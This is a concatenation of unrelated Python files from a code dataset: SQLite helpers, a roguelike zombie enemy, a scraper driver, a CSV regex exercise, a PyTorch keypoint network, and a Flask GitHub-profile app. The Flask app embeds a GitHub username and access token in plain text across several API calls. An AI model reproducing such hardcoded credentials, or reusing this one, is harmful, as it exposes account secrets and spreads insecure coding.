import Error\n\n# function to select all the contents from a table specified in the sql expression that is the input to the function\ndef select_all_from_table(sql):\n \"\"\" select values from specified table\"\"\"\n\n db_file = r\"C:\\FaultMap\\pythonsqlite.db\"\n\n conn = create_connection(db_file)\n\n try:\n cur = conn.cursor()\n cur.execute(sql)\n content_tuple = cur.fetchall()\n\n cases = []\n for row in content_tuple:\n cases.append(list(row))\n\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return cases\n\ndef create_connection(db_file):\n \"\"\" create a database connection to the SQLite databases\"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n return conn\n\ndef create_table(conn, sql):\n \"\"\" create a table from the create_table_sql statement\"\"\"\n try:\n cur = conn.cursor()\n cur.execute(sql)\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n\ndef insert_into_table(conn, sql, values):\n \"\"\" insert values into specified table\"\"\"\n try:\n cur = conn.cursor()\n cur.execute(sql, values)\n conn.commit()\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return #cur.lastrowid\n\ndef delete_from_table(conn, sql, values):\n \"\"\" delete values from specified table\"\"\"\n try:\n cur = conn.cursor()\n cur.execute(sql, values)\n conn.commit()\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return #cur.lastrowid\n\ndef drop_table(conn, sql):\n \"\"\" select values from specified table\"\"\"\n try:\n cur = conn.cursor()\n cur.execute(sql)\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n\n\ndef select_from_table_scenarios(case_id):\n \"\"\" select values from specified table\"\"\"\n\n db_file = r\"C:\\FaultMap\\pythonsqlite.db\"\n sql = ''' SELECT * FROM scenarios WHERE case_id = ?'''\n conn = create_connection(db_file)\n\n search_id = (case_id,);\n\n try:\n cur = conn.cursor()\n cur.execute(sql, search_id)\n content_tuple = cur.fetchall()\n\n scenarios = []\n for row in content_tuple:\n scenarios.append(list(row))\n\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return scenarios\n\ndef select_from_table_where(sql,id):\n \"\"\" select values from specified table\"\"\"\n\n db_file = r\"C:\\FaultMap\\pythonsqlite.db\"\n conn = create_connection(db_file)\n\n search_id = (id,);\n\n try:\n cur = conn.cursor()\n cur.execute(sql, search_id)\n content_tuple = cur.fetchall()\n\n result = []\n for row in content_tuple:\n result.append(list(row))\n\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return result\n\n\ndef convert_db_info_to_dict_weightcalc(case_id):\n sql = ''' SELECT * FROM methods WHERE case_id = ?'''\n # case_id = 1\n methods_table = select_from_table_where(sql, case_id)\n methods = []\n for method in methods_table:\n if method[2] == 1: methods.append('transfer_entropy_kernel')\n if method[3] == 1: methods.append('transfer_entropy_kraskov')\n if method[4] == 1: methods.append('cross_correlation')\n if method[5] == 1: methods.append('partial_correlation')\n\n sql = ''' SELECT * FROM scenarios WHERE case_id = ?'''\n case_id = 1\n scenarios_info = select_from_table_where(sql, case_id)\n scenarios = [i[1] for i in scenarios_info]\n\n caseconfig = {}\n caseconfig['datatype'] = 'file'\n caseconfig['methods'] = [i for i in methods]\n caseconfig['scenarios'] = [i for i in scenarios]\n scenario_ids = [i[0] for i in scenarios_info]\n\n for scenario_id in scenario_ids:\n sql = ''' SELECT * FROM settings WHERE scenario_id = ?'''\n # scenario_id = 1\n settings_info = select_from_table_where(sql, scenario_id)\n\n for setting in settings_info:\n caseconfig[setting[1]] = {\n 'use_connections': bool(setting[3]),\n 'transient': bool(setting[4]),\n 'boxnum': setting[5],\n 'boxsize': setting[6],\n 'normalise': setting[7],\n 'detrend': bool(setting[8]),\n 'delaytype': setting[9],\n 'sampling_rate': setting[10],\n 'sub_sampling_interval': setting[11],\n 'sampling_unit': setting[12],\n 'testsize': setting[13],\n 'startindex': setting[14],\n 'sigtest': bool(setting[15]),\n 'thresh_method': setting[16],\n 'surr_method': setting[17],\n 'allthresh': bool(setting[18]),\n 'additional_parameters': {\n 'test_significance': bool(setting[19]),\n 'signifigance_permutations': setting[20],\n 'auto_embed': bool(setting[21])\n }\n }\n\n for scenario in scenarios_info:\n caseconfig[scenario[1]] = {\n 'settings': [i[1] for i in settings_info],\n 'data': scenario[3],\n 'test_delays': scenario[4],\n 'causevarindexes': scenario[5],\n 'affectedvarindexes': scenario[6],\n 'bandgap_filtering': bool(scenario[7]),\n 'bidirectional_delays': bool(scenario[8]),\n 'scalelimits': scenario[9]\n }\n\n caseconfig['methods_store'] = methods\n caseconfig['scenario_store'] = [i for i in scenarios]\n\n return caseconfig\n\ndef convert_db_info_to_dict_graphreduce(case_id):\n sql = ''' SELECT * FROM scenarios WHERE case_id = ?'''\n scenarios_info = select_from_table_where(sql,case_id)\n\n caseconfig = {}\n caseconfig['datatype'] = 'file'\n caseconfig['scenarios'] = [i[1] for i in scenarios_info]\n caseconfig['scenario_store'] = [i[1] for i in scenarios_info]\n\n for scenario in scenarios_info:\n scenario_id = scenario[0]\n scenario_name = scenario[1]\n sql = ''' SELECT * FROM graphreduce WHERE scenario_id = ?'''\n graphreduce_table = select_from_table_where(sql,scenario_id)\n caseconfig[scenario_name] = {\n 'graph':graphreduce_table[0][2],\n 'percentile':graphreduce_table[0][3],\n 'depth':graphreduce_table[0][4],\n 'weight_discretion':bool(graphreduce_table[0][5])\n }\n return caseconfig\n\ndef convert_db_info_to_dict_resultrecon(case_id):\n sql = ''' SELECT * FROM scenarios WHERE case_id = ?'''\n scenarios_info = select_from_table_where(sql,case_id)\n\n caseconfig = {}\n caseconfig['datatype'] = 'file'\n caseconfig['scenarios'] = [i[1] for i in scenarios_info]\n caseconfig['scenario_store'] = [i[1] for i in scenarios_info]\n\n for scenario in scenarios_info:\n scenario_id = scenario[0]\n scenario_name = scenario[1]\n sql = ''' SELECT * FROM resultreconstruction WHERE scenario_id = ?'''\n resultrecon_table = select_from_table_where(sql,scenario_id)\n caseconfig[scenario_name] = {\n 'bias_correction':bool(resultrecon_table[0][2])\n }\n return caseconfig\n\n\ndef update_table_where(sql_update, sql_select, id):\n \"\"\" select values from specified table\"\"\"\n\n db_file = r\"C:\\FaultMap\\pythonsqlite.db\"\n conn = create_connection(db_file)\n\n update_id = (id,);\n result = []\n try:\n cur = conn.cursor()\n cur.execute(sql_update, update_id)\n conn.commit()\n cur.execute(sql_select, update_id)\n content_tuple = cur.fetchall()\n\n for row in content_tuple:\n result.append(list(row))\n\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return result\n\n\ndef convert_db_info_to_dict_noderank(case_id):\n sql = ''' SELECT * FROM scenarios WHERE case_id = ?'''\n scenarios_info = select_from_table_where(sql, case_id)\n\n caseconfig = {}\n caseconfig['datatype'] = 'file'\n caseconfig['scenarios'] = [i[1] for i in scenarios_info]\n caseconfig['scenario_store'] = [i[1] for i in scenarios_info]\n\n sql = ''' SELECT * FROM methods WHERE case_id = ?'''\n methods_table = select_from_table_where(sql, case_id)\n methods = []\n for method in methods_table:\n if method[2] == 1: methods.append('transfer_entropy_kernel')\n if method[3] == 1: methods.append('transfer_entropy_kraskov')\n if method[4] == 1: methods.append('cross_correlation')\n if method[5] == 1: methods.append('partial_correlation')\n caseconfig['weight_methods'] = [i for i in methods]\n\n sql = ''' SELECT * FROM rank_methods WHERE case_id = ?'''\n rank_methods_table = select_from_table_where(sql, case_id)\n rank_methods = []\n for method in rank_methods_table:\n if method[2] == 1: rank_methods.append('eigenvector')\n if method[3] == 1: rank_methods.append('katz')\n if method[4] == 1: rank_methods.append('pagerank')\n caseconfig['rank_methods'] = [i for i in rank_methods]\n\n for scenario in scenarios_info:\n scenario_id = scenario[0]\n scenario_name = scenario[1]\n sql = ''' SELECT * FROM noderank WHERE scenario_id = ?'''\n noderank_table = select_from_table_where(sql, scenario_id)\n caseconfig[scenario_name] = {\n 'settings': noderank_table[0][2],\n 'connections': noderank_table[0][3],\n 'm': noderank_table[0][4],\n 'boxindex_type': noderank_table[0][5],\n 'boxindex_start': noderank_table[0][6],\n 'boxindex_end': noderank_table[0][7],\n 'use_connections': bool(noderank_table[0][8]),\n 'use_bias': bool(noderank_table[0][9]),\n 'dummies': bool(noderank_table[0][10])\n }\n return caseconfig","sub_path":"db_functions.py","file_name":"db_functions.py","file_ext":"py","file_size_in_byte":10149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297476127","text":"from enemy import *\nimport random\nimport Message\n\nclass Zombie(Enemy):\n\tdef __init__(self,messageLog, currentMap = None):\n\t\tsuper().__init__(messageLog, currentMap)\n\t\tself.name = \"Zombie\"\n\t\tself.levelMod = random.choice([-2,-1,0,0,0,0,0,1,1,2])\n\t\tself.level = currentMap.level + self.levelMod\t\t\t\t\n\t\tself.character = \"z\"\t\t\n\t\tself.speed = 7\n\t\tself.hp = self.maxhp = round(4 * (max(1,self.level - 4) ** 0.4))\n\t\tself.baseDamage = round(6 * (max(1,self.level - 4) ** 0.2))\n\t\tself.baseToHit = round(4 * (max(1,self.level - 4) ** 0.2))\n\t\tself.baseToDefend = 1\n\t\tself.color = random.choice([\"silver\", \"maroon\", \"teal\"])\t\t\t\t\n\t\tself.chartype = \"Zombie\"\n\t\tself.team = 3\n\t\n\tdef ToDefend(self):\n\t\t# Differnt so doesn't get zombie DV drain\n\t\ttoDefend = self.baseToDefend +\\\n\t\t\t((self.leftHandEquipped.ToDefend + self.ToDefMod(self.leftHandEquipped.ItemClass)) if self.leftHandEquipped != None else 0) +\\\n\t\t\t((self.rightHandEquipped.ToDefend + self.ToDefMod(self.rightHandEquipped.ItemClass)) if self.rightHandEquipped !=None else 0) +\\\n\t\t\t((self.ToDefMod(7) if (self.leftHandEquipped != None and self.leftHandEquipped.ItemClass < 6 and self.rightHandEquipped != None and self.rightHandEquipped.ItemClass < 6) else 0)) +\\\n\t\t\t((self.ToDefMod(0) if (self.leftHandEquipped == None) and (self.rightHandEquipped == None) else 0))\n\t\t\n\t\treturn toDefend\n\t\n\tdef danger(self):\n\t\treturn (5 + self.levelMod/2)\n\t\n\tdef update(self):\t\t\t\n\t\tsuper().update()\n\t\ttry:\n\t\t\tnearestEnemy = min([i for i in self.currentMap.characters if i != self and i.team != self.team],\n\t\t\t\tkey = lambda i: abs(self.x - i.x) + abs(self.y - i.y))\n\t\t\tdx = 0 if nearestEnemy.x == self.x else (-1 if nearestEnemy.x < self.x else 1)\n\t\t\tdy = 0 if nearestEnemy.y == self.y else (-1 if nearestEnemy.y < self.y else 1)\n\t\t\tmonsterInSquare = [i for i in self.currentMap.characters if (i.x == self.x+dx) and (i.y == self.y+dy) and (i.team != self.team)]\n\t\t\tif len(monsterInSquare) > 0:\n\t\t\t\tself.tryMove(self.x + dx, self.y + dy)\n\t\t\telif self.currentMap.Walkable((self.x + dx, self.y + dy)):\n\t\t\t\tself.tryMove(self.x + dx, self.y + dy)\n\t\t\telif self.currentMap.Walkable((self.x + dx, self.y)) and dx != 0:\n\t\t\t\tself.tryMove(self.x + dx, self.y)\n\t\t\telif self.currentMap.Walkable((self.x, self.y+dy)) and dy != 0:\n\t\t\t\tself.tryMove(self.x, self.y + dy)\n\t\t\telse:\n\t\t\t\tself.Wait()\n\t\t\t\n\t\t\t\n\t\texcept ValueError:\n\t\t\tself.Wait()\n\t\t\treturn\n\t\t\n\t\t\n\t\t# Update nearby DVs\n\t\tfor j in [i for i in self.currentMap.characters if i.chartype != \"Zombie\" and i.chartype != \"Necromancer\"]:\n\t\t\t# Check for adjacent zombies\n\t\t\tzombies = [i for i in self.currentMap.characters if (i.chartype == \"Zombie\")\\\n\t\t\t\tand (abs(i.x - j.x) < 2)\\\n\t\t\t\tand (abs(i.y - j.y) < 2)]\n\t\t\tif len(zombies) > 0:\n\t\t\t\tclosedCount = len(zombies)\n\t\t\t\tfor x in range(j.x-1,j.x+2):\n\t\t\t\t\tfor y in range(self.y-1,self.y+2):\n\t\t\t\t\t\tif self.currentMap.Map[x][y].walkable == False:\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tclosedCount += 1\n\t\t\telse:\n\t\t\t\tclosedCount = 0\n\t\t\tj.ZombieMod = closedCount\n\t\t\tif j.ZombieMod > 4 and j.ZombieMod < 8:\t\t\t\t\n\t\t\t\tself.messageLog.append(Message.Message(j.name + \" is almost surrounded by the undead!\"))\n\t\t\tif j.ZombieMod == 8:\n\t\t\t\tself.messageLog.append(Message.Message(j.name + \" has been overrun by the undead!\"))","sub_path":"src/Zombie.py","file_name":"Zombie.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"255801514","text":"from scraping import extract_review\nimport csv\n\nstations_f = open('station.csv', 'r', encoding='utf-8-sig')\nstations_list = csv.reader(stations_f)\nrestaurant_dic = {}\nreview_f = open(\"review.csv\", \"w\")\nreview_f.write(\"식당이름\" + ',' + \"주소\" + ',' + \"평점\" + ','+ \"공감수\" + ',' + \"특징\" + ',' + \"리뷰\" + \"\\n\")\nfor station in stations_list:\n print(station[0] +\"시작\")\n extract_review(station[0], restaurant_dic, review_f)\n print(station[0] +\"끝\")\n\nstations_f.close()\nreview_f.close()\n\n\n# 서울 지하철의 모든 역의 이름이 저장되어 있는 csv파일을 읽어 리스트에 역들을 저장한다.\n# for루프를 돌며 모든 역을 검색하도록 한다.\n# extract_review 함수에 역을 전달하고, 함수 내에서 chromeDriver를 통해 브라우저에 역을 검색하고, 검색된 식당의 리뷰를 가져온다.\n# 이 때, chromeDriver의 경로 설정을 올바르게 해야 한다. (chromeDriver는 컴퓨터에 설치된 크롬 브라우저의 버전에 맞는 것을 다운해야 함)","sub_path":"scraping/regoion.py","file_name":"regoion.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"394125491","text":"import re\n\ndef read_csv(file):\n\tf = open(file, \"r\")\n\tfirst_line = f.readline()\n\tfirst_line = re.sub('\\n', '', first_line)\n\theaders = re.split(',\\s?', first_line)\n\tdata = []\n\tfor line in f:\n\t\ttext_line = re.sub('\\n', '', line)\n\t\trow = re.split(',\\s?', text_line)\n\t\tdata.append(row)\n\tf.close()\n\treturn (headers, data)\n\n\n# Q1\ndef get_degree_freq(data, headers):\n\tfield_num = headers.index(\"degree\")\n\tfreqs = {}\n\tfor row in data:\n\t\tvalue = re.sub('[.]', '', row[field_num])\n\t\tvalues = value.split()\n\t\tif len(values) > 1:\n\t\t\tfor val in values:\n\t\t\t\tif val not in freqs:\n\t\t\t\t\tfreqs[val] = 1\n\t\t\t\telse:\n\t\t\t\t\tfreqs[val] += 1\n\t\telse:\n\t\t\tif value not in freqs:\n\t\t\t\tfreqs[value] = 1\n\t\t\telse:\n\t\t\t\tfreqs[value] += 1\n\n\treturn freqs\n\n\n# Q2\ndef get_title_freq(data, headers):\n\tfield_num = headers.index(\"title\")\n\tfreqs = {}\n\tfor row in data:\n\t\tvalue = re.sub('is\\s', 'of ', row[field_num])\n\t\tvalues = value.split()\n\t\tif value not in freqs:\n\t\t\tfreqs[value] = 1\n\t\telse:\n\t\t\tfreqs[value] += 1\n\n\treturn freqs\n\n\n# Q3\ndef get_email_list(data, headers):\n\tfield_num = headers.index(\"email\")\n\temail_list = [x[field_num] for x in data]\n\treturn email_list\n\n\n# Q4\ndef get_unique_domains(list):\n\treturn set([ re.sub('.*@', '', x) for x in list if '@' in x ])\n\n\n# Used to print markdown tables for Q1 and Q2\ndef print_markdown(col):\n\ttotal = 0\n\tprint('| Title | Frequency |')\n\tprint('| ----- | --------- |')\n\n\tfor d in col:\n\t\tprint(\"| \" + str(repr(d)) + \" | \" + str(col.get(d)) + \" |\")\n\t\ttotal += col.get(d)\n\n\tprint(\"| TOTAL | \" + str(total) + \" |\")\n\n\n#########################################\n\nf = \"./faculty.csv\"\ndata_and_headers = read_csv(f)\nheaders = data_and_headers[0]\ndata = data_and_headers[1]\n\ndegrees = get_degree_freq(data, headers)\ntitles = get_title_freq(data, headers)\nemails = get_email_list(data, headers)\nunique_domains = get_unique_domains(emails)\n\n#print_markdown(degrees) #Q1 answer \n#print_markdown(titles) #Q2 answer\n#print(emails) #Q3 answer\n#print(unique_domains) #Q4 answer","sub_path":"python/advanced_python_regex.py","file_name":"advanced_python_regex.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"180320890","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, out_planes=0, stride=1):\n super(Bottleneck, self).__init__()\n out_planes = self.expansion*planes if out_planes == 0 else out_planes\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, out_planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(out_planes)\n\n self.downsample = nn.Sequential()\n if stride != 1 or in_planes != out_planes:\n self.downsample = nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(out_planes)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.downsample(x)\n out = F.relu(out)\n return out\n\n\nclass CPNet(nn.Module):\n def __init__(self, num_blocks, num_keypoints=17):\n super(CPNet, self).__init__()\n self.in_planes = 64\n self.num_keypoints = num_keypoints\n\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer( 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(512, num_blocks[3], stride=2)\n\n self.lateral1 = nn.Conv2d(2048, 256, kernel_size=1, stride=1, padding=0)\n self.lateral2 = nn.Conv2d(1024, 256, kernel_size=1, stride=1, padding=0)\n self.lateral3 = nn.Conv2d( 512, 256, kernel_size=1, stride=1, padding=0)\n self.lateral4 = nn.Conv2d( 256, 256, kernel_size=1, stride=1, padding=0)\n\n self.smooth1 = nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)\n self.smooth2 = nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)\n self.smooth3 = nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)\n\n self.global1 = self._make_global(scale_factor=8)\n self.global2 = self._make_global(scale_factor=4)\n self.global3 = self._make_global(scale_factor=2)\n self.global4 = self._make_global(scale_factor=1)\n\n self.refine1 = self._make_refine(num_blocks=3, scale_factor=8)\n self.refine2 = self._make_refine(num_blocks=2, scale_factor=4)\n self.refine3 = self._make_refine(num_blocks=1, scale_factor=2)\n self.refine4 = nn.Sequential(\n Bottleneck(4*256, 128, 256),\n nn.Conv2d(256, num_keypoints, kernel_size=3, stride=1, padding=1),\n )\n\n def _make_layer(self, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(Bottleneck(self.in_planes, planes, stride=stride))\n self.in_planes = planes * Bottleneck.expansion\n return nn.Sequential(*layers)\n\n def _make_global(self, scale_factor):\n return nn.Sequential(\n nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0),\n nn.ReLU(True),\n nn.Conv2d(256, self.num_keypoints, kernel_size=3, stride=1, padding=1),\n nn.Upsample(scale_factor=scale_factor, mode='bilinear', align_corners=False),\n )\n\n def _make_refine(self, num_blocks, scale_factor):\n layers = []\n for i in range(num_blocks):\n layers.append(Bottleneck(256,128,256))\n layers.append(nn.Upsample(scale_factor=scale_factor, mode='bilinear', align_corners=False))\n return nn.Sequential(*layers)\n\n def _upsample_smooth_add(self, x, smooth, y):\n up = F.upsample(x, scale_factor=2, mode='bilinear', align_corners=False)\n return smooth(up) + F.relu(y)\n\n def forward(self, x):\n # Top-down\n c1 = F.relu(self.bn1(self.conv1(x)))\n c1 = F.max_pool2d(c1, kernel_size=3, stride=2, padding=1)\n c2 = self.layer1(c1)\n c3 = self.layer2(c2)\n c4 = self.layer3(c3)\n c5 = self.layer4(c4)\n # Bottom-up\n p5 = self.lateral1(c5)\n p4 = self._upsample_smooth_add(p5, self.smooth1, self.lateral2(c4))\n p3 = self._upsample_smooth_add(p4, self.smooth2, self.lateral3(c3))\n p2 = self._upsample_smooth_add(p3, self.smooth3, self.lateral4(c2))\n # GlobalNet\n g5 = self.global1(p5)\n g4 = self.global2(p4)\n g3 = self.global3(p3)\n g2 = self.global4(p2)\n # RefineNet\n r5 = self.refine1(p5)\n r4 = self.refine2(p4)\n r3 = self.refine3(p3)\n r2 = p2\n r = torch.cat([r5,r4,r3,r2], 1)\n r = self.refine4(r)\n return g5, g4, g3, g2, r\n\n\ndef CPNet50():\n return CPNet([3,4,6,3])\n\ndef CPNet101():\n return CPNet([3,4,23,3])\n\ndef CPNet152():\n return CPNet([3,8,36,3])\n\n\ndef test():\n net = CPNet50()\n ys = net(torch.randn(1,3,192,256))\n for y in ys:\n print(y.size())\n\ntest()\n","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":5312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"573094327","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 13 18:52:22 2019\n\n@author: Work\n\"\"\"\nimport glob\nimport pandas as pd\nimport cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom imutils.object_detection import non_max_suppression\n# from timeit import default_timer as timer\n\n\nmodel_code=\"model\"\next = \".jpg\"\ndf_train = pd.read_csv(\"dataset/\"+model_code+\"/train_labels.csv\")\n\n\nfile_list_test = sorted(glob.glob(\"dataset/\"+model_code+\"/train/*\"+ext))\nfor path in file_list_test:\n print(path)\n name = path.split(\"\\\\\")[1]\n \n \n\n img = cv2.imread(path)\n results = df_train.loc[df_train[\"filename\"]==str(name),[\"xmin\", \"ymin\", \"xmax\", \"ymax\"]].values.tolist()\n\n \n rect = np.array([[x1,y1,x2,y2] for (x1,y1,x2,y2) in results])\n pick = non_max_suppression(rect, probs = None, overlapThresh = 0.2)\n \n \n for x1,y1,x2,y2 in pick:\n cv2.rectangle(img, (x1, y1), (x2, y2), (0,0,255), 2)\n\n\n # cv named Window\n img = cv2.resize(img, (600,353))\n cv2.imshow(\"results\", img) # cv2.resize(img, (448,448)))\n print(\"results\", rect)\n k = cv2.waitKey(30) & 0xff\n if k ==27:\n cv2.waitKey(0)\n break\n if (len(results)>0):\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n \n","sub_path":"Python/check_bboxes.py","file_name":"check_bboxes.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"204870571","text":"import tensorflow as tf\nimport ujson as json\nimport numpy as np\nfrom tqdm import tqdm\nfrom collections import Counter\nfrom util import get_batch, get_feeddict,get_pretrain_batch\nimport os\nimport constant\n\nfrom loader import read_glove, get_counter, token2id, read_data,read_pretrain\n\ntqdm.monitor_interval = 0\nnp.set_printoptions(threshold=np.nan)\n\n\ndef read(config):\n counter = get_counter(config.train_file)\n if os.path.exists(config.emb_dict):\n with open(config.emb_dict, \"r\") as fh:\n emb_dict = json.load(fh)\n else:\n emb_dict = read_glove(config.glove_word_file, counter, config.glove_word_size, config.glove_dim)\n with open(config.emb_dict, \"w\") as fh:\n json.dump(emb_dict, fh)\n word2idx_dict, fixed_emb, traiable_emb = token2id(config, counter, emb_dict)\n\n train_data = read_data(config.train_file)\n dev_data = read_data(config.dev_file)\n test_data = read_data(config.test_file)\n pretrain_data = read_pretrain(config)\n pretrain_data2 = read_pretrain(config,2)\n return word2idx_dict, fixed_emb, traiable_emb, train_data, dev_data, test_data,pretrain_data,pretrain_data2\n\ndef log(config, data, pretrain_data,word2idx_dict, model, sess,rels):\n global_step = sess.run(model.global_step) + 1\n sim_out = 0\n assert len(data) == 1\n for batch,_ in zip(get_batch(config, data, word2idx_dict,shuffle=False),get_pretrain_batch(config,pretrain_data,word2idx_dict,pretrain=False)):\n sim_out = sess.run(model.sim,feed_dict=get_feeddict(model, batch,_, is_train=False))\n sim_out = list(sim_out[0])\n assert len(sim_out)==rels.shape[0]\n sort_idx = np.argsort(np.array(sim_out))[-3:]\n if sim_out[sort_idx[-1]]<0.5:\n return {\"Can't decide\":1}\n else:\n return {constant.ID_TO_LABEL[np.argmax(rels[sort_idx[-1]])]:float(sim_out[sort_idx[-1]]),\n constant.ID_TO_LABEL[np.argmax(rels[sort_idx[-2]])]:float(sim_out[sort_idx[-2]]),\n constant.ID_TO_LABEL[np.argmax(rels[sort_idx[-3]])]:float(sim_out[sort_idx[-3]])}\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486657986","text":"from flask import Flask, redirect, request, render_template\nimport requests\nimport json\nimport random\nimport dateutil.parser\nimport datetime\n\n\nlabels = []\nvalues = []\n\ndates = []\ncommits= []\n\ncolors = [\n \"#F7464A\", \"#46BFBD\", \"#FDB45C\", \"#FEDCBA\",\n \"#ABCDEF\", \"#DDDDDD\", \"#ABCABC\", \"#4169E1\",\n \"#C71585\", \"#FF4500\", \"#FEDCBA\", \"#46BFBD\"]\n\n\n\napp= Flask(__name__)\n@app.route('/')\ndef home():\n return render_template('homePage.html')\n\n\n@app.route('/', methods=['POST'])\ndef my_form_post():\n text = request.form.get('username')\n\n #GETTING USER PROFILE INFO\n user_request = requests.get('https://api.github.com/users/'+text, auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n name = user_request[\"login\"]\n location = user_request[\"location\"]\n company = user_request[\"company\"]\n hireable = user_request[\"hireable\"]\n email = user_request[\"email\"]\n bio = user_request[\"bio\"]\n twitter_username = user_request[\"twitter_username\"]\n followers = user_request[\"followers\"]\n following = user_request[\"following\"]\n created_at = user_request[\"created_at\"]\n created_at = dateutil.parser.parse(created_at)\n created_at = created_at.date().strftime(\"%d/%m/%Y\")\n blog = user_request[\"blog\"]\n\n #GETTING Programming LANGUAGES USED INFO\n #PUTS LANGUAGES IN LABELS LIST\n #PUT LANGUAGE USED COUNT IN VALUES LIST\n user_request = requests.get('https://api.github.com/users/'+text+\"/repos\", auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n languageDict = {}\n for val in user_request :\n if(val[\"language\"] != None) : \n languageDict[val[\"language\"]] = languageDict.get(val[\"language\"], 0) + 1\n random_number = random.randint(0,16777215)\n hex_number = str(hex(random_number))\n hex_number ='#'+ hex_number[2:]\n colors.append(hex_number)\n labels = languageDict.keys()\n values = languageDict.values()\n\n #GETTING COMMIT HISTORY\n #PUTS DATES IN DATES LIST\n #PUT COMMIT COUNT IN COMMITS LIST\n user_request = requests.get('https://api.github.com/users/'+text+\"/events\", auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n for entry in user_request :\n x = entry[\"payload\"]\n if \"commits\" in x :\n size = len(x[\"commits\"])\n yourdate = dateutil.parser.parse(entry[\"created_at\"])\n yourdate = yourdate.date().strftime(\"%d/%m/%Y\")\n dates.append(yourdate)\n commits.append(size)\n maxCommitCount = max(commits)\n\n\n repoLanguages=getLanguages(text)\n\n repoLanguages = sorted(repoLanguages.items(), key= lambda x: len(x[1]))\n repoLanguages = dict(repoLanguages)\n print(\"sorted\", repoLanguages)\n #print(getLanguages(text))\n return render_template('user.html',\n name = name, location = location,\n company = company, hireable = hireable,\n email = email, bio = bio,\n twitter_username = twitter_username, followers = followers,\n following = following, created_at = created_at,\n blog = blog, title='Bitcoin Monthly Price in USD', max=1, set=zip( values, labels, colors),\n labelsLine=dates, valuesLine=commits, \n followersList=getFollowers(text), repoLanguages=repoLanguages\n )\n\n#GETS THE LIST OF FOLLOWERS OF A USER\ndef getFollowers(userName):\n user_request = requests.get('https://api.github.com/users/'+userName+\"/followers\", auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n followers = {}\n for user in user_request : \n followers[user[\"login\"]]= user[\"html_url\"]\n \n return followers\n\n# GETS THE REPOS % LANGUAGES USED\n# THE IF STATEMENT CHECK WHETHER THE LANGUAGE KEY IS SET TO A VALUE IN THE REPOS API RESPONSE\n# IF THE REPO HAS MULTIPLE LANGUAGES THIS VLAUE IS NULL AND THE LANGUAGES ARE STORED AT THE /REPO/LANGUAGES API ENPOINT\n# IF THE REPO HAS A SINGLE VALUE THEN THE LANGUAGE WILL BE DIRECTLY STORED ON THE /REPOS API ENPOINT\ndef getLanguages(userName):\n user_request = requests.get('https://api.github.com/users/'+userName+\"/repos\", auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n repoLanguages = {}\n for repo in user_request :\n if repo[\"language\"] :\n language_request = requests.get('https://api.github.com/repos/'+repo[\"full_name\"]+\"/languages\", auth=('rowlanja', '72f894a6faa4ee1fd6cee8b51bb722d6587a0601')).json()\n repoLanguages[repo[\"name\"]] = language_request\n elif repo[\"language\"] and not(repo[\"language\"] is None):\n repoLanguages[repo[\"name\"]] = repo[\"language\"]\n return 